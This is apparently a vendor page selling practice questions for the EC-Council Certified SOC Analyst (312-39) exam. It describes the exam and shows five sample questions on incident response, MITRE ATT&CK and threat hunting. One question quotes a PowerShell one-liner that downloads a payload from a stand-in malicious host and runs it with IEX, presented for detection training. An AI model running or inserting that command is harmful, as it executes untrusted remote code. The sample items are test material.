EC-Council · CSA
Validates foundational and advanced skills in Security Operations Center monitoring and analysis, covering SOC operations, SIEM deployment and use cases, log management, incident triaging, indicators of compromise investigation, threat hunting, and malware analysis.
Practice Questions
570
≈ 4 practice exams
Duration
180 minutes
Passing Score
70%
Difficulty
AssociateLast Updated
Feb 2026
Use this CSA practice exam to prepare for Certified SOC Analyst (CSA) with realistic questions, detailed explanations, and focused study modes. The practice bank includes 570 questions for EC-Council CSA, so you can review the exam steadily instead of relying on one long cram session.
As you practice, pay extra attention to patterns in your missed answers. Start with short sessions to identify weak areas, then move into timed quizzes once your accuracy is consistent.
The explanations are especially useful when you want to connect exam wording to the responsibilities and scenarios described in the official certification guidance. Use the free preview first, then unlock the full question bank when you are ready to build a complete study routine.
The Certified SOC Analyst (CSA) — exam code 312-39 — is an associate-level credential awarded by EC-Council that validates a candidate's ability to perform Tier I and Tier II Security Operations Center (SOC) functions. The certification covers the full SOC workflow, from understanding the People, Process, and Technology framework of SOC operations to deploying and tuning SIEM platforms, managing centralized log pipelines, triaging alerts, investigating indicators of compromise (IoCs), and executing incident response procedures. The curriculum spans over 350 SIEM use cases across application, network, insider-threat, and compliance scenarios, and incorporates AI-enabled capabilities for alert prioritization, threat detection automation, and SIEM rule generation.
The CSA is the only SOC analyst credential that maps 100% to the NIST/NICE Framework under the Protect and Defend (PR) work role of Cyber Defense Analysis (CDA). It was recently updated to CSA v2, adding modules on cloud security operations (AWS, Azure, GCP), forensic investigation and malware analysis within a SOC context, and threat hunting using modern tools such as Velociraptor, YARA, and UEBA platforms. Candidates gain hands-on experience with industry-standard platforms including Splunk, the ELK Stack, OSSIM, and Log360, preparing them to operate effectively in real-world SOC environments from day one.
The CSA is primarily designed for current and aspiring Tier I and Tier II SOC analysts seeking to formalize and advance their operational skills. It is equally well-suited for network administrators, network security engineers, and cybersecurity analysts who want to transition into a dedicated security operations role. IT professionals working in network defense, security monitoring, or incident handling — including federal employees and government contractors with NICE Framework responsibilities — will find the credential directly applicable to their daily work.
Candidates do not need prior security certifications to pursue the CSA, but a foundational understanding of networking concepts, operating systems, and basic cybersecurity principles is strongly recommended. Professionals who have completed EC-Council's Network Defense Essentials (NDE) or Certified Network Defender (CND), or who hold equivalent knowledge, are well-positioned to succeed.
EC-Council does not mandate formal prerequisites for the CSA exam, making it accessible to candidates early in their cybersecurity careers. However, EC-Council recommends that candidates possess a working knowledge of networking fundamentals (TCP/IP, protocols, network devices), basic operating system concepts for both Windows and Linux environments, and a general understanding of information security concepts before attempting the exam.
Candidates who complete EC-Council's official CSA training program — available in instructor-led, online self-paced, and live-online formats — are best prepared for the exam, as the course is aligned directly to the exam blueprint. Practical familiarity with at least one SIEM platform (such as Splunk or the ELK Stack) and exposure to log analysis tools will significantly ease the learning curve for the more heavily weighted domains.
The CSA exam (code 312-39) consists of 100 multiple-choice questions delivered in a proctored format through EC-Council's ECC Exam Centre. Candidates are allotted 180 minutes (3 hours) to complete the exam. A passing score of 70% (70 out of 100 correct) is required to earn the certification. The exam is available as an online proctored test or at an authorized EC-Council testing center.
The exam is aligned to the CSA v2 blueprint, and all questions are mapped to the eight official exam domains. There are no separate practical or lab components required to earn the certification, though EC-Council's official training includes extensive hands-on lab exercises. The exam fee is approximately $250 USD, and the resulting certification is valid for three years, after which holders must earn continuing education credits or retake the exam to maintain the credential.
Earning the CSA credential positions professionals for Tier I and Tier II SOC analyst roles, which are among the most consistently in-demand positions in cybersecurity. SOC analysts in the United States typically earn between $60,000 and $95,000 annually at the entry-to-mid level, with Tier II analysts and those holding recognized credentials commanding salaries toward the higher end of that range. The CSA is recognized by government agencies and federal contractors, and its alignment to the NICE Framework (CDA work role) makes it relevant for public-sector cybersecurity positions that require role-based certifications.
Compared to alternatives such as CompTIA CySA+ or the SANS GIAC GCIA, the CSA is more narrowly focused on SOC operations and SIEM-centric detection workflows, making it a strong choice for professionals whose day-to-day work centers on alert triage and incident monitoring rather than broader threat analysis or network forensics. The CSA is often pursued as a stepping stone toward more advanced EC-Council credentials such as the Certified Incident Handler (E|CIH) or Certified Threat Intelligence Analyst (C|TIA), or toward vendor-specific SIEM certifications from Splunk or Microsoft.
5 sample questions with answers and explanations. The full bank has 570 questions, enough for 4 full-length practice exams.
Preview — answers shown1. An incident response team follows NIST SP 800-61 methodology during a ransomware investigation. The team has completed Detection and Analysis, confirming 15 servers are encrypted. Management requests immediate restoration from backups to minimize downtime. According to NIST SP 800-61, which phase must the team complete before recovery? (Select one!)
Explanation
NIST SP 800-61 requires completing Containment and Eradication before Recovery to ensure the threat is eliminated and cannot re-infect restored systems. Containment isolates affected systems, while Eradication removes malware and closes attack vectors. Recovering without eradication risks immediate re-encryption of restored data. Post-Incident Activity occurs after full recovery to document lessons learned. Preparation is the first phase performed before incidents occur, not during active response. The sequential nature of incident response phases ensures threats are fully addressed before restoration.
2. A SOC team implements the MITRE ATT&CK framework for threat hunting and detection engineering. The team identifies multiple alerts showing WMI command execution, remote service creation, and PsExec activity between workstations during business hours. Which MITRE ATT&CK tactic does this activity pattern primarily represent? (Select one!)
Explanation
Lateral Movement (TA0008) is the primary tactic represented because the activity shows techniques for moving between systems within the network. WMI execution, remote service creation, and PsExec are all techniques under MITRE ATT&CK T1021 (Remote Services) used for lateral movement. The activity occurring between workstations rather than from external sources indicates post-compromise movement. Initial Access (TA0001) represents the entry point into the network, not internal movement. Execution (TA0002) represents running malicious code but focuses on the execution mechanism rather than the strategic purpose of moving laterally. Collection (TA0009) involves gathering data before exfiltration. While these techniques involve execution, their primary purpose is moving between systems to expand access, making Lateral Movement the correct tactical classification.
3. A security team performs credentialed vulnerability scanning of Windows servers to meet PCI DSS v4.0 compliance requirements. What is the primary advantage of credentialed scanning compared to non-credentialed scanning? (Select one!)
Explanation
Credentialed scanning uses authentication to access systems internally, enabling detection of missing patches, configuration weaknesses, installed software versions, and vulnerabilities not visible from external network scans. This provides deeper visibility and more accurate results required for compliance standards like PCI DSS. Credentialed scans typically take longer than non-credentialed scans due to comprehensive internal checks. Non-credentialed scans actually produce more false positives by making assumptions about internal configurations based on external service behavior. Compliance requirements like PCI DSS v4.0 specifically require credentialed scanning for accurate vulnerability assessment.
4. A Tier 3 threat hunter applies the Diamond Model of Intrusion Analysis to investigate an APT campaign. Starting with a known malicious IP address (infrastructure vertex), the analyst wants to identify the adversary group. Which pivot strategy follows the Diamond Model methodology? (Select one!)
Explanation
The Diamond Model's core axiom states that for every intrusion event, an adversary uses a capability over infrastructure against a victim. When starting from one vertex (infrastructure IP), analysts pivot to discover other vertices. The correct approach correlates the known IP with threat intelligence to identify malware families or tools (capability vertex), then links those capabilities to threat actor groups (adversary vertex) based on TTP patterns and historical campaign data. This methodical pivoting builds a complete picture of the intrusion. Geolocation-based attribution is unreliable because attackers use VPNs, compromised systems, and hosting in multiple countries. Focusing only on victim impact ignores the relationship between adversary, capability, and infrastructure needed for attribution. Waiting for law enforcement attribution is passive and unnecessary since threat intelligence analysis can identify adversary patterns independently using the Diamond Model framework.
5. A threat hunting team uses PowerShell Script Block Logging (Event ID 4104) to detect malicious activity. An event contains the deobfuscated script content: [System.Net.WebClient]::new().DownloadString('http://malicious.com/payload.ps1') | IEX. Which MITRE ATT&CK technique is demonstrated? (Select one!)
Explanation
The script demonstrates T1105 Ingress Tool Transfer by downloading a remote payload (DownloadString from external URL) combined with T1059.001 PowerShell execution (using IEX/Invoke-Expression to execute the downloaded content). This represents the complete attack chain of transferring malicious tools and executing them. While PowerShell execution (T1059.001) is present, it does not capture the download component. T1071.001 Web Protocols describes command and control communication channels, not the initial payload delivery. T1027 Obfuscated Files would apply if the script itself was encoded or obfuscated, but Event ID 4104 logs deobfuscated content, revealing the plaintext attack.
Certified Application Security Engineer Java (CASE-Java)
CASE-Java · 623 questions
Network Defense Essentials (NDE)
NDE · 627 questions
Certified Secure Computer User (CSCU)
CSCU · 630 questions
Certified Threat Intelligence Analyst (CTIA)
CTIA · 740 questions
Certified Chief Information Security Officer (CCISO)
CCISO · 578 questions
Certified Ethical Hacker (CEH)
CEH · 594 questions
$17.99
One-time access to this exam